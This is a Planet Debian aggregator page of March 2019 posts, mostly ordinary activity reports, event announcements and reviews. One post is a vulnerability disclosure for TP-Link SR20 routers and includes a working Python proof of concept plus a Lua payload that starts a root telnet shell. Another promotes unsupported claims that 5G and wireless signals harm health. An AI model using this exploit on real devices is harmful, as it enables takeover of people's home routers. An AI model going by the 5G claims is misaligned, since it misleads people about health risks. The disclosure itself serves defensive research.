Planet Debian

Subscribe to Planet Debian feed
Planet Debian -
Updated: 8 min 47 sec ago

Chris Lamb: Free software activities in March 2019

31 March, 2019 - 22:55

Here is my monthly update covering what I have been doing in the free software world during March 2019 (previous month):

  • My activities as the current Debian Project Leader are covered in my Bits from the DPL (March 2019) email to the debian-devel-announce mailing list. Attentive followers of the on-going Debian Project Leader Elections will have noted that I am not running for a consecutive third term, so this was therefore my last such update, at least for the time being…

  • Presented at the Free Software Foundation's 2019 edition of LibrePlanet at Massachusetts Institute of Technology, Cambridge, MA on Redis Labs and the tragedy of the Commons Clause. It was great catching up with a large number of free software friends and colleagues. A splendid event as usual but a special congratulations here to Deb Nicholson for winning the FSF's award for the Advancement of Free Software.

  • As part of my duties of being on the board of directors of the Open Source Initiative I attended our monthy board meeting, participated in various licensing discussions occurring on the internet and formally approved the results of the recent OSI Board Member Election results which, as it happens, means that the Board is now predominantly female.

  • Updated my pull request for the shadow UNIX password system to make the build reproducible in order to support the case where secure_getenv(3) is not provided by the system C library. [...]

  • Opened pull requests for the Toil workflow engine [...] and the Vue.js URL router [...] to make their respective builds reproducible.

  • Attended a Debian Bug Squashing Party in Cambridge, United Kingdom. Thanks to Steve McIntyre for arranging and hosting the event.

  • For the Tails privacy-oriented operating system I reviewed and tested a number of feature branches (eg. #16452 & #16559) as well as contributed to a number of discussions on IRC, the mailing lists and on the issue tracker itself (eg. #16552).

  • Updated my django-agpl library — which makes it easier for Django web applications to satisfy the conditions of the GNU Affero General Public License — to set the correct mimetype for .zip files. [...]

  • Fastmail recently updated their user interface which had broken my Fastmail Enhancement Suite Chrome browser extension, requiring some attention. [...]

  • More hacking on the Lintian static analysis tool for Debian packages:

    • Check for placeholder "<project>" strings in debian/watch files as it can result in uscan(1) generating a file with shell metacharacters. (#923589)
    • Support dh-sequence-{gir,gnome,python3} virtual packages as satisfying various build-dependencies. (#924082)
    • Fix false-positives for the version-substvar-for-external-package tag when the Provides field contains multiple items or leading whitespace. (#833608)
    • Correct false-positives in when checking for dh-runit packages that lack a Breaks substitution variable. (#924116)
    • Don't detect non-maintainer upload versions when checking for maintainer scripts that support "ancient" package versions. (#924501)
    • Add itialize to the list of spelling-error-in-binary exceptions. (#923725)
    • Update a large number of tag long descriptions. [...][...][...]

Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws almost all software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

The initiative is proud to be a member project of the Software Freedom Conservancy, a not-for-profit 501(c)(3) charity focused on ethical technology and user freedom. Conservancy acts as a corporate umbrella, allowing projects to operate as non-profit initiatives without managing their own corporate structure. If you like the work of the Conservancy or the Reproducible Builds project, please consider becoming an official supporter.

This month, I:

I also made the following changes to our tooling:


diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues.

  • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
  • Provide explicit help when the libarchive system package is missing / incomplete. (#50)
  • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied. [...]
  • Improved the displayed comment whenever resorting to a binary diff to mention the file's type. (#49)
  • Make --use-dbgsym a ternary operator to make it easier to totally disable. (re. #2)
  • Explicitly mention when the guestfs module is missing at runtime and thus are falling back to a binary diff. (#45)
  • Tidied definition of the no file-specific differences were detected message suffix. [...]
  • Corrected a "recurse" typo [...] and uploaded version 113 to Debian unstable.

strip-nondeterminism is our tool to remove specific non-deterministic results from a completed build.

Debian Patches contributed
  • pymongo: Please update the Homepage field. (#924078)

  • wondershaper: Suggest using $IFACE in an /etc/network/interfaces reference. (#924011)

Debian LTS

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project.

  • Investigated and triaged cron, python2.7, python3.4, systemd, openssl (CVE-2019-1543), etc.

  • Frontdesk duties, responding to user/developer questions, reviewing others' packages, etc.

  • Issued DLA 1719-1 — it was discovered that there was a denial of service vulnerability in the libjpeg-turbo JPEG image library. A heap-based buffer over-read could be triggered by a specially-crafted bitmap file.

  • Uploaded ruby-i18n 0.7.0-2+deb9u1 to strech-security to prevent a remote denial-of-service vulnerability via an application crash. (#913093)


Finally, I also made the following non-maintainer uploads (NMUs) to fix release-critical (RC) bugs for the upcoming Debian buster release:

FTP Team

As a Debian FTP assistant I ACCEPTed 14 packages: gcc-9, gcc-9-cross, gcc-9-cross-ports, gnome-shell-extension-bluetooth-quick-connect, golang-github-facebookgo-structtag, golang-github-rs-zerolog, golang-gopkg-stretchr-testify.v1, httpdirfs-fuse, maint-guide, nvidia-graphics-drivers, piuparts, pyglet, qtbase-opensource-src & qtdeclarative-opensource-src.

Joerg Jaspert: Miscellaneous, DPL election, Archive changes, Crazyness

31 March, 2019 - 16:09

As usual, a long time since my last blog. Not that I have been idle, but usually I prefer doing real things over blogging. But hey, here goes one, could be getting long too.

A lot happened since I last blogged. Lets start with the boring stuff: I managed to get myself a slipped disc. Not a boring one either that could be treated “old school”. Would be boring, so I managed to get the whole disc out, leaving 2 bones of my spinal column sit directly on each other. All doctors had been quite surprised and told me they never saw an issue that big.

Surgery, recovery time, life

As it was impossible to do anything except for a surgery, there was no question about it, surgery it had to be. I surprised the docs with telling them Not before day X, as I had a quite important appointment on that day - my son starting school. Day after I let them cut me open and put in an implant.

Recovery times.

Some three and a half hours of surgery are taking an impressive amount of energy out of one, wouldn’t have thought it that bad. Combined with an order to mostly lie down flat for quite a while, it took longer than expected to get back up.

At some point I was told to mostly walk or lie, try not standing still or sitting too much. At the same time the school of my son looked for help during noon hours, so I took my walk time to monitor some elementary school kids. Turns out I am way better at it than anyone expected and they really love me, always asking when I come again, now that I am back at my normal job.


Except for that excitement with a surgery, life is happy normal, which is good. 2 kids around means it is not boring. Work sponsored me a new e-bike, so I am using that a lot - and my older son always wants to go with me. By now he manages 40km tours and plans to reach at least 50km this summer, more if possible. Impressive for a 6, soon 7, years old.


As some may have noticed, I nominated myself for this years DPL election. Crazy times, indeed. Got four other candidates, one has withdrawn in the meantime, so we will have a ballot with 5 options (don’t forget famous NOTA).

My company helpfully agreed on quite a bunch of time I can take, should I really get elected, which I think will also help the other areas I am active in.

I won’t bore you with repeating what I said in my platform or on the Debian Vote List, if you are interested in the DPL election business, feel free to read through it all. It is certainly an interesting campaigning period until now.

Whoever will win in the end, I am sure it will be a good DPL.

Archive changes

Something that turned out to be more felt by people out there have been my recent archive changes. I finally went and archived the wheezy release, long out of support is is. And also jessie, which is only partly out of support - LTS is still active.

Deleting files

Just archiving (moving things to the machines does not really gain much, the goal is to free up space in the main archive and on the mirrors. Which means deleting the suites and all their files from the archive. For wheezy, that was simple, just use the dak archive tools to set all involved suites empty. Then the usual cleanup processes will get rid of the files, and in a way that mirrors won’t break. Say, deleting only a certain number of files at one mirror push, as our mirrors limit how many files can be deleted at once.

For jessie it was a little more complicated, as the LTS architectures should continue to exist. So it wasn’t a simple “delete it all”, but the right set of files needed to stay around.

Turns out that, while those removals are all fine, at least some suites should continue to stay alive, even if they are empty. Or they generate errors on users systems that don’t really need to be. Say, the jessie-updates suite, while being empty and not receiving any updates anymore (LTS goes via security archive only) is configured per default everywhere.


A while ago there have been two cases in the Debian project where we had to enforce rules and actively take away membership. Something which never was, nor will it ever be, an easy decision.

One of those cases resolved itself nicely in the meantime, in time for the running DPL election even.

The other one seems hell bent on proving our decision right every other day. And ensuring they won’t ever be able to be called Debian Developer, as sad as it is. It is astonishing how much one can defy reality, spit out lies and false accusations and live in a bubble. The sad thing just being how much energy this is needlessly taken away from all people involved.

Molly de Blanc: Free software activities (March, 2019)

30 March, 2019 - 21:48

March was overrun with work, work, work. Planning a conference takes a lot out of you and consumes a lot of time, even when you’re getting paid to do it.

I used to volunteer to run conferences and, looking back on it, I don’t know how we managed with a part-time, all volunteer crew. LibrePlanet is organized by the FSF staff, with various pre-conference help from technical volunteers, and a small army of volunteers at the conference itself.

March activities (personal)
  • I ran for and was re-elected to the Open Source Initiative board of directors.
  • The OSI had one board meeting, and a call to ratify the results of the elections.
  • I worked on talks for FOSS North and Linux Fest North West.
  • I applied to speak at All Things Open.
  • I attended my first Bug Squashing Party in Paris!
  • Along with the rest of the Debian Outreach Team, I worked on the project’s participation in Outreachy and GSoC.
  • The Debian A-H team met, and handled incident reports.
  • March brought the 8th and 9th instances –the latter just under the wire — of people being mean to me on the internet. I had a mocha and a cappuccino, respectively.
March activities (professional)
  • I (along with an amazing team) ran a conference. That’s pretty much all I did.

Daniel Stender: Series of screencasts related to DevOps and Debian packaging

30 March, 2019 - 13:37

Howdy! I’ve begun a series of DevOps and Debian packaging related Screencasts which are provided on a channel at Youtube. At the moment there is:

The screencasts are straightforward without any fuzz, just how this and that has to be done on a workbench. More stuff is coming up if there are some subscriptions.

Mike Gabriel: Picnic in the Dead Zone

30 March, 2019 - 04:13

Today, I talked to Christoph. He is from a local, rather new intiative here in Nothern Germany:

     Picknick im Funkloch

(Picnic in the Dead Zone).

We discussed how DAS-NETZWERKTEAM (my FLOSS business) can support that initiative on the technical level (we will start with mailing lists).

The Picnic in the Dead Zone initiative aims at making people more aware of possible health consequences that may be caused by the upcoming 5G mobile standard reaching 90%-plus coverage.

Personally, I know individual people who are (highly) sensitive to electro-magnetic radiation and fields (they can tell you if wireless network is on or off, tell you which access point where in the house is on or off, can differentiate between WiFi and PoweLAN, etc.). For people with such a sensitivity it is crucial to have spots in the country they want to live in, where electro-magnetic radiation is at a minimum level. Mobile connectivity does not work for everyone. Hyper-sensitive people suffer from it, in fact.

@all-the-Germans: Currently, there is an ePetition waiting for (maybe your) signature(s) on the German Bundestag's ePetition home page. The signing deadline is pretty close: 4th April 2019. If you think, that we should re-consider the whole 5G technology once more, study its impact on animal (including ourselves) physiology and plant physiology a little bit better, then please take some time and visit this URL and consider signing the following petition (if, do it asap):


Louis-Philippe Véronneau: Montreal's Debian & Stuff - April 2019

30 March, 2019 - 03:45

We had another Debian & Stuff in Montreal last weekend. Some people from the local FOSS community wanted to gather and watch the LibrePlanet 2019 livestream and we thought merging it with a D&S would be a good idea.

People came and went, but all in all around 10 people showed up and we had tons of fun. I ended up hacking some more on my Tor Puppet module and played around with packaging the Tomu's bootloader in Debian.

Some of the talks were really great. The videos aren't online yet, but if you eventually want to watch some of them, Tarek Loubani's opening keynote on FOSS and medical devices in Gaza was amazing (and hard to watch1). I also really enjoyed Shauna Gordon-McKeon's talk on governing the software commons.

Thanks to the folks at Koumbit for hosting us!

  1. Amongst other things, he played videos of Israeli soldiers cheerfully sniping civilians, showed multiple pictures of kids loosing limbs and told us how a fellow doctor he was working with got pinned down and killed by sniper rounds fired by the IDF while trying to rescue injured civilians. 

Martin Michlmayr: FOSSASIA 2019 in Singapore

29 March, 2019 - 14:42

I attended FOSSASIA earlier this month. This conference has been on my radar for many years but I never managed to attend before.

I was impressed by the organization of the conference. Furthermore, I liked that the audience was completely different to the conferences I normally attend. There were so many new people. FOSSASIA has grown not just to be a conference, but also an umbrella organization for several open source projects.

I gave a talk about open source culture, using Debian as an example. I find this type of presentation important because this is where a lot of pitfalls are for many new contributors. Learning technologies is easy, but figuring out all the unwritten norms and rules of a community can be daunting. Of course, it was particularly interesting to give this talk in an environment where I'm the cultural outsider. While I've visited a number of Asian countries, there's a lot about the different cultures I have yet to learn.

I met a number of Debian contributors, including Andrew Lee, Norbert Preining (who talked about TeX Live), Graham Williams (who used to contribute to Debian in the early days and heads an AI team at Microsoft in Singapore now), Kai Hendry (who used to contribute to Debian) and others. I also spent some time away from the conference to write my DPL platform.

Thank you to Hong Phuc Dang, Mario Behling and all the other organizers and volunteers for a wonderful event!

Dirk Eddelbuettel: drat 0.1.5: New release

29 March, 2019 - 08:34

A new version of drat just arrived on CRAN. And like the last time in December 2017 it went through as an automatically processed upgrade directly from the CRAN prechecks. Being a simple package can have its upsides…

And like the last time, this release once again draws largely upon contributed pull requests. Neal Fultz cleaned up how Windows paths are handled when inserting Windows (binary) packages. And Christoph Stepper extended the support for binary packages the helper commands pruneRepo and archivePackages. I added a minor cleanup to a test Neal added in the previous version, and that made a quick and simple release!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases is the better way to distribute code.

As your mother told you: Friends don’t let friends install random git commit snapshots. Rolled-up release it is. And despite what some (who may not know it well) say, drat is actually rather easy to use, documented by five vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.1.5 (2019-03-28)
  • Changes in drat functionality

    • Windows paths are handled better when inserting packages (Neal Fultz in #70)

    • Binary packages are now supported for the pruneRepo and archivePackages commands (Christoph Stepper in #79).

  • Changes in drat documentation

    • Properly prefix R path in system call in a tests (Dirk in minor cleanup to #70).

Courtesy of CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

29 March, 2019 - 05:18
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      while (0 < attempts) {
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      else {
        if (lua_State != 0) {
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it

Proof of concept:

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
# Create a file in your tftp directory with the following contents:
#function config_test(config)
#  os.execute("telnetd -l /bin/")
# Execute script as remoteaddr filename
import binascii
import socket
port_send = 1040
port_receive = 61000
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


Jonathan Carter: Debian and Fun

29 March, 2019 - 00:57

Brief background

When I started working on my DPL platform, I read through some platforms of recent years. Many of them made some mention of either making Debian a more fun project to contribute to, or keeping it so, even to the point where it has been considered a cliché. Recently, Lucas Nussbaum (DPL between 2013 and 2015), posted a list of DPL roles as he sees it, listing “Keep Debian fun and functional” as responsibility #0, so we know that it’s generally expected from the DPL to help make Debian a good project to be part of and contribute to.

In Marga’s platform that I linked above, she delves into what exactly “more fun” would mean. Oddly enough, few platforms which mentions ‘making Debian fun’ as a goal actually do that, which is also why I chose to be more specific in my platform about changes that I’d like to promote instead of just using a blanket term such as “make Debian more fun”.

Keeping employees engaged

The image below has been making rounds on the Internet for a long time, I couldn’t find it’s original source, but I think it’s still a great high-level summary of things that a company should keep in mind to keep their employees engaged and maintain a good relationship.

If you’re having trouble reading that, it says:

Employees stay engaged when they are:

  • Paid well
  • Mentored
  • Challenged
  • Promoted
  • Involved
  • Appreciated
  • Valued
  • On a Mission
  • Empowered
  • Trusted

Plenty of other platforms touched on some of these over the years. So I wondered… what would an ideal “Debian contributors stay when…” infographic look like?

Keeping and making fun in Debian

What’s great about the average Debian contributor is that they already want to be part of Debian. We don’t have to spend as much time as a commercial company does to incentivise a person to be part of the project. So I think in many ways, keeping Debian fun mostly involves removing bad obstacles/blockers and allowing a contributor to do their work with the least amount of friction. Having said that, I also believe that there is scope for making fun, that is, actively doing things that are enjoyable and that may attract more contributors.

Originally, I was going to write a loooooooooooooong piece on this and then make a graphic based on it, and around an hour in to it, around half way done, I realised it’s just going to be way too long and abandoned it in favour of going straight to the graphic.

So here goes, I call it version 0.0 of a Debian Fun Statement.

If you read DPL platforms this year and previous years, you’ll certainly recognise some elements from it. It reads:

In Debian, we’re having fun when:

  • we’re doing valuable work
  • we’re proud to be associated with the project
  • we’re feeling safe
  • we have opportunities to learn and grow
  • we figure out how to work out our differences
  • we work together on solutions
  • we’re efficient at making decisions
  • we’re getting things done
  • we’re sharing our knowledge with others
  • we feel appreciated
  • we feel understood
  • we feel included

I referred to it as a Debian Fun Statement and not the Debian Fun Statement, because I hastily put it together myself, it’s not official in any way at all. I think it might be worth while for us as a community to put together some nice final wording and for someone with graphic skills to do some nice layout/artwork.

As part of my campaign running for DPL, I want to let Debianites know that I plan towards making all of the above count for every Debian contributor. I tried to encode that as much as possible in to my platform, and hope that it comes across that way when you read it. Feedback is always welcome, thanks for reading!

Thomas Lange: New FAI version and ISO images

28 March, 2019 - 23:42

The new version FAI is available in two variants. FAI 5.8.4 is for Debian buster and FAI 5.8.4~bpo9+2 is the same for the stable distribution called stretch, including the configs for stretch.

You can get the packages when adding one of these lines to your sources.list:

deb stretch koeln


deb buster koeln

New FAI ISO images using stretch are now available from [1]. The FAIme build service [2] for customized cloud and installation images also uses the newest FAI versions.




Holger Levsen: 20190328-mini-debconf-hamburg-2019

28 March, 2019 - 18:21
Registration now open for the Mini-DebConf in Hamburg in June 2019


With great joy we are finally offically announcing the Debian MiniDebConf which will take place in Hamburg (Germany) from June 5 to 9, with three days of Debcamp style hacking, followed by two days of talks, workshops and more hacking. And then, Monday the 10th is also a holiday in Germany (and some other countries), so you might choose to extend your stay by a day! (Though there will not be an official schedule for the 10th.)

TL;DR: We're having a MiniDebConf 2019 in Hamburg on June 5-9 It's going to be awesome. You should all come! Register now!

We tried to cut the longer version below a bit shorter and rely more on the wiki. If some information is missing, please reply to this email and we'll fix it.


Please register now, registration is free and open now until May 23rd.

In order to register, add your name and details to the registration page in the Debian wiki.

There's space for approximately 150 people due to limited space in the main auditorium.

Please register ASAP, as we need this information for planning food and hacking space size calculations.

Talks wanted (CfP)

We have assembled a content team (consisting of Michael Banck and Lee Garrett), who soon will publish an extra post for the CfP. Though you don't need to wait for that and can already send your proposals to

We will have talks on Saturday and Sunday, the exact slots are yet to be determined by the content team.

We expect submissions and talks to be held in English, as this is the working language in Debian and at this event.

Debian Sprints

The miniDebcamp from Wednesday to Friday is a perfect opportunity to host Debian sprints. We would welcome if teams assemble and work together on their projects.

Sponsors wanted

Making a Mini DebConf happen costs money, we need to rent the venue, video gear, hopefully can pay hard working volunteers lunch and dinner, probably sponsor some travel costs and last not least print T-Shirts.

We very much appreciate companies willing to support Debian through this meeting!

We have three sponsor categories:

  • 1000€ = sponsor, listed as such in all material and on the t-shirts.

  • 2500€ = gold sponsor, listed as such in all material & shirts, logo featured in the videos.

  • 5000€ = platinum sponsor, listed as such prominently in all material & shirts, logo featured prominently in the videos

Plus, there's corporate registration as an option too, where we will charge you 250€ for the registration. Please contact us if you are interested in that!


The event will be hosted in the Victoria Kaserne (also called Fux or Frappant), which is a collective art space located in a historical monument. It is located between S-Altona and S-Holstenstraße, so there is a direct subway connection to/from the Hamburg Airport (HAM) and Altona is also a long distance train station.

There's a Gigabit-Fiber uplink connection and wireless coverage basically everywhere in the venue and in the outside areas.

More information about the venue is provided in the wiki.


The Mini-DebConf will take place in the center of Hamburg, so there are many accomodation options available. Some suggestions for housing options are given in the wiki and you might want to share your findings there too.

There is also limited on-site accomodation available, please send a mail to holger@d.o if you'd like to stay on site

More volunteers wanted

Some things still need more helping hands:

We need some volunteers for frontdesk duties, which mostly means being at the venue in the morning before things start (though if possible frontdesk should be operated throughout the day)and help people find their way.

We also need more video volunteers. We know the gear will arrive, together with a person knowing how to operate it, but that's it. Please consider making sure we'll have videos released! (And streams hopefully too.)

In general, if you notice something to improve, try to be the change you want to see.


If you want to help, need help, have comments or want to contact us for other reasons, there are several ways:

  • the irc channel #debconf-hamburg on
  • the mailing list
  • editing the wiki page which will notify us

Looking forward to see you in Hamburg!

Holger, for the 2019 Mini DebConf Hamburg team

Bits from Debian: Debian is welcoming applicants for Outreachy and GSoC 2019

28 March, 2019 - 18:15

Debian is dedicated to increasing the diversity of contributors to the project and improving the inclusivity of the project. We strongly believe working towards these goals provides benefits both for people from backgrounds that are currently under-represented in free software, and for the wider movement, by increasing the range of skills, experiences and viewpoints contributing to it.

As part of this outreach effort, Debian is participating in the next round of Outreachy.

The application period for the May 2019 to August 2019 round has been extended until April 2, and Debian offers the following projects:

Outreachy invites applicants who are women (both cis and trans), trans men, and genderqueer people to apply. Anyone who faces systemic bias or discrimination in the technology industry of their country is also invited to apply.

Don't wait up! You can learn more details on how to submit your application or get help in our wiki page for Outreachy and the Outreachy website.

Debian is also participating in the Google Summer of Code (GSoC) with eight projects, and the student application period is open until April 9.

You can learn more details on how to submit your GSoC application or get help for in our wiki page for GSoC and the Google Summer of Code website.

We encourage people who are elegible for Outreachy and GSoC to submit their application to both programs.

Russ Allbery: Review: Caliban's War

28 March, 2019 - 10:44

Review: Caliban's War, by James S.A. Corey

Series: The Expanse #2 Publisher: Orbit Copyright: June 2012 ISBN: 0-316-20227-4 Format: Kindle Pages: 594

Caliban's War is the sequel to Leviathan Wakes and the second book in the Expanse series. This is the sort of series that has an over-arching, long-term plot line with major developments in each book, so it's unfortunately easy to be spoiled by reading anything about later volumes of the series. (I'm usually reasonably good at avoiding spoilers, but still know a bit more than I want about subsequent developments.) I'm going to try to keep this review relatively free of spoilers, but even discussion of characters gives a few things away. If you want to stay entirely unspoiled, you may not want to read this.

Also, as that probably makes obvious, there's little point in reading this series out of order, although the authors do a reasonably good job filling in the events of the previous book. (James S.A. Corey is a pseudonym for the writing team of Daniel Abraham and Ty Franck.) I still resorted to reading the Wikipedia plot summary, though, since it had been years since I read the first book.

Caliban's War opens on Ganymede, a year and a half after the events of Leviathan Wakes. Thanks to its magnetosphere, Ganymede enjoys rare protection from Jupiter's radiation field. Thanks to meticulously-engineered solar arrays, it is the bread basket of the outer solar system. That's before an inhuman creature attacks a unit of Earth and then Martian soldiers, killing all but one of them and sparking an orbital battle between Mars and Earth that destroys much of Ganymede's fragile human ecosystem. Ganymede's collapse is the first problem: a humanitarian catastrophe. The second problem is the attacking creature, which may be a new destabilizing weapon and may be some new twist on the threat of Leviathan Wakes. And the third problem is Venus, where incomprehensible things are happening that casually violate the known laws of physics.

James Holden returns to play a similar role as he did in Leviathan Wakes: the excessively idealistic pain in the ass who tends to blow open everyone's carefully-managed political machinations. Unfortunately, I think this worked much less well in this book. Holden has a crisis of conscience and spends rather a lot of the book being whiny and angstful, which I found more irritating than entertaining. I think it was an attempt at showing some deeper nuance in his relationships with his crew, but it didn't work for me.

The new character around whom the plot revolves is Prax, a botanist whose daughter is mysteriously kidnapped in the prelude of the book. (Apparently it can't be an Expanse novel without a kidnapped girl or woman.) He's unfortunately more of a plot device than a person for most of the story. One complaint I have about this about this book is that the opening chapters on Ganymede drag on for much longer than I'd prefer, while running Prax through the wringer and not revealing much about the plot. This is another nearly 600 page book; I think it would have been a tighter, sharper book if it were shorter.

That said, the other two new viewpoint characters, Bobbie and Avasarala, make up for a lot.

Avasarala is an apparently undistinguished member of the UN Earth government who has rather more power than her position indicates because she's extremely good at political maneuvering. I loved her within twenty pages of when she was introduced, and kept being delighted by her for the whole book. One of my favorite tropes in fiction is watching highly competent people be highly competent, and it's even better when they have engagingly blunt personalities. Avasarala is by turns grandmotherly and ruthless, polite and foul-mouthed, and grumpy and kind. Even on her own, she's great; when she crosses paths with Bobbie, the one surviving Martian marine from the initial attack who gets tangled in the resulting politics, something wonderful happens. Bobbie's principled and straightforward honesty is the perfect foil for Avasarala's strategic politics. Those sections are by far the best part of this book.

I think this is a somewhat weaker book than Leviathan Wakes. It starts slow and bogs down a bit in the middle with Holden's angst and relationship problems. But Avasarala is wonderful and makes everything better and gets plenty of viewpoint chapters, as does Bobbie who becomes both a lens through which to see more of Avasarala and a believable and sympathetic character in her own right. The main plot of the series does move forward somewhat, but this feels like mostly side story and stage setting. If you enjoyed Leviathan Wakes, though, I think you'll enjoy this, for Avasarala and Bobbie if nothing else.

Caliban's War satisfactorily closes out its own plot arc, but it introduces a substantial cliff-hanger in the last pages as setup for the next book in the series.

Followed by Abaddon's Gate in the novel sense. There is a novella, Gods of Risk, set between this book and Abaddon's Gate, but it's optional reading.

Rating: 7 out of 10

Dirk Eddelbuettel: #21: A Third and Final (?) Post on Stripping R Libraries

28 March, 2019 - 09:31

Welcome to the 21th post in the reasonably relevant R ramblings series, or R4 for short.

Back in August of 2017, we wrote two posts #9: Compating your Share Libraries and #10: Compacting your Shared Libraries, After The Build about “stripping” shared libraries. This involves removing auxiliary information (such as debug symbols and more) from the shared libraries which can greatly reduce the installed size (on suitable platforms – it mostly matters where I work, i.e. on Linux). As an illustration we included this chart:

Chart from August 2017 post

Two items this week made me think of these posts. First was that a few days ago I noticed the following src/Makefile of the precrec package I was starting to use more:

# copied from
# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

And lo and behold, the quoted package rvinecopulib

has the same

CXX_STD      = CXX11
PKG_CPPFLAGS = -I../inst/include -pthread

# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

I was intrigued and googled a little. To my surprise I found one related reference … in a stone-old src/Makevars of mine in RcppClassic and probably written in 2007 or 2008. But more astonishing, the actual reference to the “phony target” trick is in … the #9 post from August 2017 referenced above. Doh. Younger me knew this, current me did not, and as those two packages didn’t reference my earlier use I had to re-find it. Oh well.

But the topic is still a very important one. The two blog posts show how to deal with this locally as a user and “consumer” of packages (as well as via the “phony trick” as a producer of packages) as well as an admin of a system with such packages. Personally I had been using this trick since August 2017 via my ~/.R/Makevars.

And we were still missing such a tool for the more general deployment. Well, until today, or rather, until R 3.6.0 comes out offically on April 26. The (excellent) R-devel Daily ‘NEWS’ feed – which itself was the topic of post #3: Follow R-devel – will likely show tomorrow something about this commit I spotted by following Winston’s mirror of the R-devel sources:

Part of ‘strip on install’ commit

And indeed, we now can now do this with R-devel (rebuilt from today’s sources):

edd@rob:~$ RD CMD INSTALL --help | grep strip
      --strip           strip shared object(s)

As a quick check, installing the (small, C-only) digest package without / with the --strip options gets us, respectively, 425kb and 123kb. So the ratios from the chart above should now be achievable directly from R CMD INSTALL --strip with R 3.6.0. (And for what it is worth, it still works with the older tricks mentioned above.)

And as occupying disk space with unused debugging symbols is wasteful, the new extension to R CMD INSTALL is most welcome.

Last but not least: It is this type of relentless small improvements to R, its innards, its installations and support by R Core that make this system for Programming with Data such an excellent tool and joy to use and follow. A big Thank You! to R Core for all they do, and do quietly yet relentlessly. It is immensely appreciated.

Lucas Nussbaum: Removal of jessie-updates and jessie-backports from Debian mirrors

